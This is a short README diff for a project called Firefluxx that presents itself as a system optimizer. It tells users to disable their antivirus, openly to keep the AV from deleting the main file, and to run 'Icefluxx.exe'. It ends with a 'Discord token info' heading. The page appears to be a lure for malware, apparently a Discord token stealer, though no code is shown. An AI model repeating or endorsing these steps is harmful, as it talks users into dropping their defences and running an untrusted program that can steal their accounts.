TheMan0175/Firefluxx/README.md

  ░  ░ ░         ░  ░           ░  ░   ░      ░    ░   ░    ░
     ░

-IMPORTANT: Disable AV [Anti-Virus] to get the best performace.
+IMPORTANT: Disable AV [Anti-Virus] to get the best performance.
+It is also to prevent the AV from deleting the main file.

 ❄️ Temporarily disable your antivirus to prevent interference with system optimization.
 ❄️ Open "Icefluxx.exe" for exclusive access to configuration settings.
-❄️ Customize settings in "Config.json" to unlock unique system features.
+❄️ Quick to use, User-Friendly GUI.

 -=======-
 -=Discord token info